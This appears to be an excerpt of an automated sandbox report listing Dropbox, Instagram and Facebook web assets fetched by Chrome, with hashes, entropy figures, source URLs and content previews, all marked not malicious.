                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_chat_chat_client-vflPVfXx7.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="923f6ef5-2468-3c6e-86f9-2ff816fee269")}catch(e){}}();.define(["require","exports","./c_api_v2_routes_user_metadata_provider","./c_core_notify","./e_file_viewer_static_scl_page_file","./c_hive_schemas_sharing-request_access_user_events","./c_core_i18n","react-dom","react","./e_core_exception","./c_src_sink_index"],(function(t,e,a,i,s,n,r,o,h,c,d){"use strict";function p(t){return t&&t.__esModule?t:{default:t}}function m(t){if(t&&t.__esModule)return t;var e=Object.create(null);return t&&Object.keys(t).forEach((function(a){if("default"!==a){var i=Object.getOwnPropertyDescriptor(t,a);Object.defineProperty(e,a,i.get?i:{enumerable:!0,get:function(){return t[a]}})}})),e.default=t,Object.freeze(e)}var g=m(o),l=p(h);function _(t){return"1508d082-aa3d-468f-9ac3-cfeb7d5a8435"===t||"c0b3fc4
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 86 x 13, 8-bit/color RGB, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):61
                                                                        Entropy (8bit):4.022997040570906
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D9363A2C5F993B39B6178D2941B41A4A
                                                                        SHA1:D5B82E2E5A8E216953CCBC7E07E2F3E05C78B04C
                                                                        SHA-256:99C9EEC3B3763282DB1339D01BDF8744B29CD8CAA633CAAFE7556B25DE8AB3A4
                                                                        SHA-512:C9634C3BCBDAB944524F796C66C086695026941F7708F7C751B18777B0C720B1994023331CE8CDB17ACB87A0F4698507CF41F2AF58E453A4550ECCC027AC2A3A
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.PNG........IHDR...V..........}......IDAT.....$.....IEND.B`.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (21020)
                                                                        Category:downloaded
                                                                        Size (bytes):408274
                                                                        Entropy (8bit):4.877199657867283
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F86C9590A05D36F94DD4551C2BCD868C
                                                                        SHA1:B02EA36E2AB60E49AA1D7FC2DBBB17EA7E2796C9
                                                                        SHA-256:683FB6D0B1DACC538AC0ECF42CC9C1F93D7C8EFEB74B575D10E6B556C425C4CD
                                                                        SHA-512:A799FC687E158C1EC6C7621431EF8D76E6C8B75CBBE985DDC2676FB95359534B7484EA15408B5825F94D003C86AFE62F8AE2881DF10B8AA72E4268B6CEDE77CD
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/typescript/component_libraries/dwg-components/src/index.web-vfl-GyVkK.css
                                                                        Preview:./* -- typescript/component_libraries/dwg-components/src/atoms/dwg-box/index.web.css */..dwg-box{-webkit-tap-highlight-color:transparent;box-sizing:border-box}./* -- typescript/component_libraries/dwg-components/src/atoms/dwg-flex-grid/index.web.css */..dwg-flex-grid{--dwg-flex-grid__columns:var(--dwg-flex-grid__columns--mobile);width:100%}.dwg-flex-grid__cell{--dwg-flex-grid__col-span:var(--dwg-flex-grid__col-span--mobile,1);--dwg-flex-grid__col-pad-left:var(--dwg-flex-grid__col-pad-left--mobile,0);--dwg-flex-grid__col-pad-right:var(--dwg-flex-grid__col-pad-right--mobile,0)}@media (min-width:480px){.dwg-flex-grid{--dwg-flex-grid__columns:var(. --dwg-flex-grid__columns--mobile-lg,var(--dwg-flex-grid__columns--mobile). )}.dwg-flex-grid__cell{--dwg-flex-grid__col-span:var(. --dwg-flex-grid__col-span--mobile-lg,var(--dwg-flex-grid__col-span--mobile). );--dwg-flex-grid__col-pad-left:var(. --dwg-flex-grid__col-pad-left--mobile-lg,var(--dwg-flex
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65264)
                                                                        Category:downloaded
                                                                        Size (bytes):195135
                                                                        Entropy (8bit):5.511589531455853
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:11905937C6428E4AF4E32BF048948B11
                                                                        SHA1:0EE680545A8D91F30A0EE379CD37F736762C7E46
                                                                        SHA-256:A43213CB479DD666415D3077B4A9C2FCA64E95140953DEF870605241285AE36D
                                                                        SHA-512:942C2299B4823A16CD83D677EB379FEFFEAD3FB1A7DACF2B7265FC0EE7CD5F469B032935821540E62991D4D30C8253EE368450DCA542E89C72C4BF7F5BB108B9
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_fingerprintjs_fpjs-pro-static_fp-vflEZBZN8.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="b45b5f09-5624-3716-a911-afbf383d09d5")}catch(e){}}();.define(["exports"],(function(n){"use strict";var t=function(){return t=Object.assign||function(n){for(var t,r=1,e=arguments.length;r<e;r++)for(var i in t=arguments[r])Object.prototype.hasOwnProperty.call(t,i)&&(n[i]=t[i]);return n},t.apply(this,arguments)};function r(n,t){var r={};for(var e in n)Object.prototype.hasOwnProperty.call(n,e)&&t.indexOf(e)<0&&(r[e]=n[e]);if(null!=n&&"function"==typeof Object.getOwnPropertySymbols){var i=0;for(e=Object.getOwnPropertySymbols(n);i<e.length;i++)t.indexOf(e[i])<0&&Object.prototype.propertyIsEnumerable.call(n,e[i])&&(r[e[i]]=n[e[i]])}return r}function e(n,t,r,e){return new(r||(r=Promise))((function(i,o){function u(n){try{a(e.next(n))}catch(n){o(n)}}function c(n){try{a(e.throw(n))}catch(n
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (356)
                                                                        Category:downloaded
                                                                        Size (bytes):1287
                                                                        Entropy (8bit):4.934330844021112
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:FF7F138387F4AD8D3C7916E83DDC81D8
                                                                        SHA1:7D030ECFDB0BF4B9D87BCAED3BE92718BE33CCD5
                                                                        SHA-256:DD9F008F15A77C8E48DE1E043B60543B816A76BFE83AF2E61BC0E75061F8904D
                                                                        SHA-512:FE816A2E4CABCED1715B06D79C813AC95568FEE1D5A2ADF41352C6197A48946EBF8CCC653DEA211769E0AA023532758CAF3651C5361144F937F3C63A6CF655F4
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://static.cdninstagram.com/rsrc.php/v3/yE/r/t98ZFitznKQ.js?_nc_x=Ij3Wp8lg5Kz
                                                                        Preview:;/*FB_PKG_DELIM*/..__d("PolarisExploreLocationsDirectoryLandingRoot.entrypoint",["JSResourceForInteraction"],(function(a,b,c,d,e,f,g){"use strict";a={getPreloadProps:function(a){return{queries:{}}},root:c("JSResourceForInteraction")("PolarisExploreLocationsDirectoryLandingRoot.react").__setRef("PolarisExploreLocationsDirectoryLandingRoot.entrypoint")};g["default"]=a}),98);.__d("PolarisIgLiteCarbonRoot.entrypoint",["JSResourceForInteraction"],(function(a,b,c,d,e,f,g){"use strict";a={getPreloadProps:function(a){return{queries:{}}},root:c("JSResourceForInteraction")("PolarisIgLiteCarbonRoot.react").__setRef("PolarisIgLiteCarbonRoot.entrypoint")};g["default"]=a}),98);.__d("PolarisLanguagePreferencesRoot.entrypoint",["JSResourceForInteraction"],(function(a,b,c,d,e,f,g){"use strict";a={getPreloadProps:function(a){return{queries:{}}},root:c("JSResourceForInteraction")("PolarisLanguagePreferencesRoot.react").__setRef("PolarisLanguagePreferencesRoot.entrypoint")};g["default"]=a}),98);.__d("Pola
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (362)
                                                                        Category:downloaded
                                                                        Size (bytes):363
                                                                        Entropy (8bit):4.770323504150667
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:7D3C66659E01077F47CBDD74349E60FA
                                                                        SHA1:86EC17A2B340E0E3BD6B84E38CE741D0867C0B9F
                                                                        SHA-256:B4374EBF2AD5928DC936BB92738388059F1A6DF117AA47FB33F741B8DA23F864
                                                                        SHA-512:EEDF041724AE168E147CF0C92E342C1BD3EE7468FAFF63FB781B476B2541D18E26F1FB133597C4F92A3485ECAA15496AAC7A0DF41BC387CB4462AD4CDF5DC41F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/sharing/shared_folder_invitation_google_one_tap-vflfTxmZZ.css
                                                                        Preview:.sf-invite-signup-page .login-register-container .one-tap-tos__terms-container .checkbox_label{margin-left:0;position:static;line-height:18px !important;font-weight:400 !important}.sf-invite-signup-page .one-tap-tos{background-color:#fff;max-width:415px}.sf-invite-signup-page .one-tap-tos__modal{max-width:415px;display:block;margin-left:auto;margin-right:auto}.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):4418
                                                                        Entropy (8bit):4.550570902126072
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D6C32610BC01D28D09392E8CAE4869E6
                                                                        SHA1:1A248754B2853D6FFA0381BBA3C4CA65C1AF19C5
                                                                        SHA-256:107F84EDAF1294B3B3681D48FAFE9DE85165493D55EA9C361FA08ECBD7994148
                                                                        SHA-512:1F62F8FC1A3C6165019B7D736E04154D55C5135F83AE3A67E07FE55C00A2714297061C93A79DD5A9B710C6AC00F5286EC4E9992836802C223F5A4AECD518112D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/legacy-token-migration-vfl1sMmEL.css
                                                                        Preview:/* .In-Theme-Provider is the generic class we use to say we're inside of DIG's theme provider..we use it here as a way to ensure that the specificity of this selector can beat `0 1 0` assuming.it is loaded **after** the other dig tokens..*/..In-Theme-Provider {. --color__standard__background: var(--dig-color__background__base);. --color__faint__background: var(--dig-color__background__subtle);. --color__elevated__background: var(--dig-color__background__raised);. --color__standard__text: var(--dig-color__text__base);. --color__faint__text: var(--dig-color__text__subtle);. --color__standard__border: var(--dig-color__border__base);. --color__faint__border: var(--dig-color__border__subtle);. --color__disabled__text: var(--dig-color__disabled__base);. --color__disabled__border: var(--dig-color__disabled__base);. --color__disabled__background: var(--dig-color__disabled__base);. --color__core__accent: var(--dig-color__primary__base);. --color__attention__text: var(--dig-color__pr
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (26100)
                                                                        Category:dropped
                                                                        Size (bytes):26467
                                                                        Entropy (8bit):5.258396155375204
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E4BE26091C041AA518C32DDA3DABE2F9
                                                                        SHA1:9608DD1509D81F4F4205C63A0E89A971A83B9BA4
                                                                        SHA-256:D925D09B4A47B7A4FAC7BC90A6E2FB433508FB9CC876692D38E4BB76CEF6AB32
                                                                        SHA-512:0C3FF38A7A5B592712DB1B26C9B21C691E177ACAF7B27CC07232C21D3D76333D25F39291A184AE86F8BE1505A9202B464A8A2F1BE20D54B22A7C722F34BBAD21
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="b96d8077-5247-38d8-a64b-26cf668e7cb2")}catch(e){}}();.define(["require","exports","./e_file_viewer_static_scl_page_file","./e_core_exception","./c_ux_analytics_ux_variants","react","./c_core_i18n","./c_src_sink_index","./c_plugin_utils_getImageDefaultSizes","./c_lodash","./c_api_v2_routes_user_metadata_provider","metaserver/static/js/langpack","./e_edison","./c_pap-events_sign_save_signature_doc","./c_init_data_edison","./c_hive_schemas_sharing-request_access_user_events","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_memoize-one","./c_api_v2_noauth_client","metaserver/static/js/modules/constants/viewer","./c_security_csrf_hmac"],(function(e,t,n,i,a,s,o,r,l,c,d,u,h,g,m,_,p,f,v,y,E,w,k,I){"use strict";function x(){try
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 250 x 541, 8-bit/color RGBA, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):52369
                                                                        Entropy (8bit):7.994644431511666
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:489D893405D48FA9B0547D2FFC80D8E3
                                                                        SHA1:35999D0AE8964CC536FB0F1BCB8A00F49C201503
                                                                        SHA-256:89152C6B5D650050E542912484E0367FFBE7C6080E1B762FAFB3C3AA93B91189
                                                                        SHA-512:B7AB1CF248C03149292F5BF5020BB2CC17C450927F242B1C86E7684B5802BAB583683D13242957FF0E180EF7B81A4CF4EA1D1F2F24636A94CCD34C7CE8780948
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://www.instagram.com/images/instagram/xig/homepage/screenshots/screenshot2.png?__d=www
                                                                        Preview:.PNG........IHDR..............2`....XIDATx..].|UE...{..$!.BM..B@E?W.......e...........U.,..P.D.E....b/. .....H%=o....=......T...{..w...2..(.5......&._....=.O..:[)....<.@..A..4...s:..C.p.@..ip....4s.m.!...gBZZ..h.zH.OAt...TP..s$2......._..(..8~Ma..HX.....!db....|.....`.;..e.."..."..C......w.^.*-m%..^QII......x.O.8..?......z.`.....f..W.1.%.).....?..z..5.v......(..6'.O.....zF$q*.}..e.*p.$J.%J.0....k..O._P.{.!..)....c?0:$..m"A1>....`....R.. xP.OW4P.#..?$..`.8.$...P7.o.....^'@..G.X.5.\.3.%'....k........h.p.`}...zI>...H\..[P..9.r.....]..I..($...m.nA........M]....J.kc.......8....Q..r.-....eP.s.....j...ns.b..eam..A.....S+....n.V.}....)pH..2.3S.)..[.....*.`XA!.h..C.e$....b;...My>......R.M.{w.W.GTT^.*...~!..$g=].w.r-.=D.....n...c.pr.\*... .....G....xL. .V.z.x..T?........e..|.JC......5.......R........B ..Q.g...:.|............A.*......\...7..z...0......G5.......yn......pc.2..]9......Vi....Yg...h.3.}..n........EYiIz..C.../.$.A..O..S..........>}:...p..W..~.m.jl.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):96
                                                                        Entropy (8bit):5.576691797393334
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:3E814B866E17ED15D6D9164B1FA8A47E
                                                                        SHA1:0E5005DDE4203BF7B8492743214B7C57EAB94087
                                                                        SHA-256:DE31D890CF6D834B37370A3BB878E0537E18D23CF924ABDC1E303DBE1FFA0C5C
                                                                        SHA-512:9D8968DC01B8F1B6344AA795F800E1B2A8CB5C69D4DE99D1E54A4358D4B3F81DDAB949EC53F9012FAC039998A00F553CFBF8D4FBD9FBAF1E31628BA986650DD1
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:hzZAGRxivOvc/IXdIcaVzUauJR6F+Mprs4nBWX6FMsENcpWYbhpB+WVxnuurG9M4jfCwJFnB6GZ8meDLc1klgTeuk9A3S9E=
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (24576)
                                                                        Category:dropped
                                                                        Size (bytes):137837
                                                                        Entropy (8bit):5.804480211478983
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:ED752A834100B40C383C7662EF1D2DF3
                                                                        SHA1:0E7AD27C5C97FE92A96816506AB54C07AD0E89E2
                                                                        SHA-256:72941C7FA472919325E39D7CE516C16E2CC3310ED3C9421808FDF332032BE738
                                                                        SHA-512:980D8F880607DBB1EB886A99244A155F79ECFFD166BFFB176F64346A7CBCAF8F5410717297CFB435825EB7619B0DF3F5193D3FD537184598172916D1023DE9BD
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:;/*FB_PKG_DELIM*/..__d("CAAFetaSavePasswordInterstitialQuery_facebookRelayOperation",[],(function(a,b,c,d,e,f){e.exports="8407178725973234"}),null);.__d("CAAFetaSavePasswordInterstitialQuery$Parameters",["CAAFetaSavePasswordInterstitialQuery_facebookRelayOperation"],(function(a,b,c,d,e,f){"use strict";a={kind:"PreloadableConcreteRequest",params:{id:b("CAAFetaSavePasswordInterstitialQuery_facebookRelayOperation"),metadata:{},name:"CAAFetaSavePasswordInterstitialQuery",operationKind:"query",text:null}};e.exports=a}),null);.__d("ConsentFlowName",[],(function(a,b,c,d,e,f){a=Object.freeze({ACV_FB_1ST_TIME_3PD_CONSENT:"acv_fb_1st_time_3pd_consent",ACV_FB_CONSENT_DEBUT_2ND:"acv_fb_consent_debut_2nd",ACV_FB_CONSENT_DEBUT_2ND_RECONSIDER:"acv_fb_consent_debut_2nd_reconsider",ACV_FB_CONSENT_DEBUT_BLOCKING:"acv_fb_consent_debut_blocking",ACV_FB_CONSENT_DEBUT_CONFIRMATION:"acv_fb_consent_debut_confirmation",ACV_FB_CONSENT_DEBUT_RECONSIDER:"acv_fb_consent_debut_reconsider",ACV_FB_HEADLINE:"acv_fb_he
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 15376
                                                                        Category:downloaded
                                                                        Size (bytes):5448
                                                                        Entropy (8bit):7.961670827441197
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A0233D9C3A967D689D0362CAF4D4A0AA
                                                                        SHA1:13759FBE9499301BD5D075FC68E73046CC61A308
                                                                        SHA-256:9FF0C074BD96C4782B11486EFE61130E754B84AA91029E734A8E268D7902BDB0
                                                                        SHA-512:F6227C0B6647B2674BBC7F703EBFFD95EE44A9E0BD45647E8EC72B5569CE0831BFA148BB76967F742D52E439287DA5A1C9255FAB51D53FAA9B8C798E9E7FA279
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/webpack/production/dropins_sdk~paper_binder~paper_bundle~paper_cloud_docs~paper_influencer~paper_native_desktop~paper_n~977af152_3a7d5dc15db04ee5594b.v5EUj5b8MrTP80Y-7FnzYJ67PCJ3NovTT4gJjmOhEa4.js.gz
                                                                        Preview:...........[.o.8..]....D.X..m..]7{..).t....(..Y.D.W....$..r.[<.b.Z../..|f.A..#.R..d.-N........wo..p.~\.......^...~............[.q.".....JHB.K..4.....i...q...c...,..F^.=".m.W..{.'U..^."...9...x.....cQ....&.vj.<.o...k../......>...?gB.j..64.._.H.P5..&^.B..n.<.tD\n.8}y..C.r;........'g..b.[._NOg.B......1......g.X..{rE.w(x!..#.PG...#...nXD.u.;....4..!.}H.....m./ ......6wndg.^.".5.aHt...b.WT...}J.;......!o..,..... ...,)........eiJ#.....S\`...@p..j5...Z.B>[M*.OX.d.A.m....F.p..RA.80MZ`X...@@~..sH......kI......E.B..sj......,...}B.`D..C....V.7C[..z..U..Y....p.!...,.F...z.R.b....P[...T.8.\I..R.-.4pv w. .....|8....sP..h.K..,...n...x..>.IH.rh...e(.a.....'VTnz.8B.H..d.|.F.A".(.....A....5e.......~...4.MG.........."x..w.Z..y.l....v...=.N.... .2N.!uP@BN...%D....g...'...}.a6...p....t..,.0N....kG R.. N7r[$.......x..DK.JL.t.......!?..,..4.g...[.(..;..1 .zR...t*W.w...\...A.........)........Y.4.X\....D....)l;.Qv.F..e...A1.z.P.o.;...a..|m...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65445)
                                                                        Category:dropped
                                                                        Size (bytes):154225
                                                                        Entropy (8bit):5.492066961964918
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:DB55AD7BD877204BFAB70A67CCB9BCC5
                                                                        SHA1:555DE86083BD3BB5C05D877E1B89812724AF8559
                                                                        SHA-256:586304CBD9AF92F73D48B9539390D3091BA1C4A68E9DA9CC135BD53422360D2F
                                                                        SHA-512:BABC46931CA1F7E6767AEA12C263E7EA04D457422CE64676A5C78CB0395A5234551B07BA8AF46E520DF880292BB2D1FA30C673E0DBF2AB9A7FECD89F9A5A6AA2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/MDzNl_j9yvg/. */.__d("lodash-4.17.15",[],(function(a,b,c,d,e,f){"use strict";var g={},h={exports:g},i;function j(){(function(){var b,c="4.17.15",d=200,e="Unsupported core-js use. Try https://npms.io/search?q=ponyfill.",f="Expected a function",j="__lodash_hash_undefined__",k=500,l="__lodash_placeholder__",m=1,n=2,o=4,p=1,q=2,r=1,s=2,t=4,u=8,v=16,w=32,x=64,y=128,z=256,A=512,B=30,aa="...",ba=800,ca=16,da=1,ea=2,C=3,fa=1/0,ga=9007199254740991,ha=17976931348623157e292,ia=0/0,D=4294967295,ja=D-1,ka=D>>>1,la=[["ary",y],["bind",r],["bindKey",s],["curry",u],["curryRight",v],["flip",A],["partial",w],["partialRight",x],["rearg",z]],ma="[object Arguments]",na="[object Array]",oa="[object AsyncFunction]",pa="[object Boolean]",qa="[object Date]",ra="[object DOMException]",sa="[object Error]",ta="[object Function]",ua="[object GeneratorFunction]",E="[object Map]",va="[object Number]",wa="[object Null]",xa="[object Object]",F="[
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (654)
                                                                        Category:downloaded
                                                                        Size (bytes):1036
                                                                        Entropy (8bit):5.323296704358444
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:80CCDE85B980E138C0AAF5AB227EF54B
                                                                        SHA1:534A8883BD9582295FC2B867215944D66F1837E7
                                                                        SHA-256:407881C9106BEF52F6F4FE354488E31558D4D88F2A3BF2F2E8D919C35F62C9EB
                                                                        SHA-512:CFAA91DA7F071C8CF9A4ADE3A434062ED2AF292ED50254396562D35B0F994381EC748DE985C520486BFA2DF83086BAD4A633DCFA8C7389DD9EC6EF8F31A639BC
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-illustrations/index.web-vflgMzehb.css
                                                                        Preview:/** @generated -- This file is automatically synced from @dropbox/dig-illustrations@3.3.0. DO NOT MODIFY! **/../**. This file should not be imported into your CSS or SASS files - the CSS variables will be available on the page for you to use.. DO NOT USE THIS FILE OR THE CSS VARIABLE TOKENS WITHOUT FIRST TALKING TO THE DESIGN SYSTEMS ON-CALL (SEE #design-systems ON SLACK).**/...dig-Theme--bright,:root{--color__illustration__inverse__dynamicline:#f7f5f2;--color__illustration__lightline:#f7f5f2}.dig-Theme--dark{--color__illustration__inverse__dynamicline:#1e1919}.dig-Mode--bright,.dig-Theme--bright,:root{--color__illustration__dynamicline:#1e1919}.dig-Mode--dark,.dig-Theme--dark{--color__illustration__dynamicline:#f7f5f2}.dig-Illustration{color:var(--color__illustration__dynamicline);height:100%;width:100%}.dig-Illustration.dig-Illustration--inverse{color:var(--color__illustration__inverse__dynamicline)}.dig-Illustration-spot{min-height:200px}.dig-Illustration-hero{min-height:338px}.di
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 79094
                                                                        Category:downloaded
                                                                        Size (bytes):21334
                                                                        Entropy (8bit):7.988745662001116
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:095DDDD80A22C0126120E6E571E26F15
                                                                        SHA1:8B801340AA93674D6EE5B2EE670D835DC3ADC636
                                                                        SHA-256:23EE41C27FF9068A7216844A59F2FF0FBBD51565BA6FCDD2D68CE2BEEB6A7C22
                                                                        SHA-512:496B7E0B77618D7E6E2A4FC8BBB0AFED52183760389DF2506F2B299D9765315E6DF19CB8D3EEF725C47E4CF538B884B9310306F5B5F4D47A6F8429C2CE722296
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/webpack/production/paper_admin~paper_binder~paper_bundle~paper_cloud_docs~paper_dashboard~paper_graphql~paper_influence~887f98f3_12dec3a22c84c56fddbc.Z832t_PJHMPtvN15qrHJPepjDmmVTw2-0AfqhGXvGo8.js.gz
                                                                        Preview:............n.. .._....&.BT...l..R.v..n...NZ.....b..d.T......`...a...1......\.e......+.d./)........$."b./;....~......g.......?......{......q.e6.....Opz..B.Q..!4.zX.0..!..ex..A&_.~6...4...O.F..i..4..xxx0=:..X....o.w.G6F.Q..ne-3..XJ.f............B;G;G.........w....t..qr...u...n.....p...gYL.N.....f8..a.]6..7..u.~s~.n.q..3....~..?#l..qI..D~.Q......z.%.........O..~v..r.&i.bv.`.../8`n.b.a..........j..6........#....[:.. N......E.U......}...N....?d.[e.P-vV.2.c.C3.`H...-...Y....Dj...0.8(...Z.....xc#u...J'..7.yo..4..]..v..3..9.....I...s...Qd3D.~..Wd..zb..-.\.......+V.&.S.)..+U..Og...,+a.FMa..q.-.......'e.x2........N.q:...]M...f.:.U6..}q>3g,G...V.r..v.djc..N.eN..#c.exu...;.y.M.]'."..'Ito3t5q8..(o>G.;..C..u...P.6..u}..7q....V.~... w.....`.;......?.vP.......=j.....:(.}.}.s.........AK...;.G{...+k8...&()...U..b.v.".. .a7#.a.x.]f."I..(...$.~....9....c@.hZ....s.s.9.np....^l[...Yt..-$.,7.i.3.:..y..e...3..._...^.......x.r.....-..Yf9.......2bW..kk.N.....
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2790)
                                                                        Category:downloaded
                                                                        Size (bytes):3170
                                                                        Entropy (8bit):5.274349278485045
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:3D0BB078C2C465BEC44CB9D8CC0600D9
                                                                        SHA1:D4F334BCFBB7484669ACDB94F9D295AAD49775A9
                                                                        SHA-256:69F1EAC74962230E7373727C42A48683E138CAE3584D0C45AD77F16845C97608
                                                                        SHA-512:DD3057D552C7429089DD78F66F851608F4ADEB3B687CB5DFFF2C92C76E9B27FFA8BAE292D9C3B9A66571B481BCA6796B688C5B0F44C4378F9E58D5BED02A7D47
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_ux_analytics_ux_variants-vflPQuweM.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="93a70b91-d2f5-3e2a-9b88-20a2b72e3d1c")}catch(e){}}();.define(["exports","./e_file_viewer_static_scl_page_file"],(function(t,e){"use strict";const n="variants",s=",",o=":";let r=0;const a=(t=!1)=>{const n=(t,e)=>{const n=[],s=document.head.querySelectorAll(`meta[${t}]`);return s?(Array.prototype.forEach.call(s,(s=>{try{const o=s.getAttribute(t);if(!o)return;e?n.push(...JSON.parse(o)):n.push(o)}catch{}})),n):[]};if(t&&r>1||!t&&r)return;r++,(()=>{const t=e.getUXVariantsFromDOM();if(!t)return;const n=f(t,"matchers"),s=[];for(const[t,e]of n){const n={feature_name:t,event_name:JSON.parse(e).event_name};s.push(n)}m({variant_tokens:t,matchers:s})})();const o=n("data-uxa-matcher-configs",!0),a=n("data-uxa-variant-tokens",!1);if(!o.length||!a.length)return;m({variant_tokens:a.join(s),matc
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 43308, version 1.66
                                                                        Category:downloaded
                                                                        Size (bytes):43308
                                                                        Entropy (8bit):7.995084572292543
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:93B6F18EC99BCB7C3FA7EA570A75E240
                                                                        SHA1:60B9E3062FE532CBC18B897FAC542C56A03544C7
                                                                        SHA-256:43693F7BDD6146E783FAB3F75BA0A51AA3CF9530ADBF790DBD686FC8A17AA3DB
                                                                        SHA-512:AC1A9398B74EB75AC4D52B9A9054A1ADD5A836F2572B99307851A0BB6D93288A13199E06E5DF4F1391209403BF775C9235A679BD081CA7F62B7752ED0FA691C6
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Regular-Web-vflk7bxjs.woff2
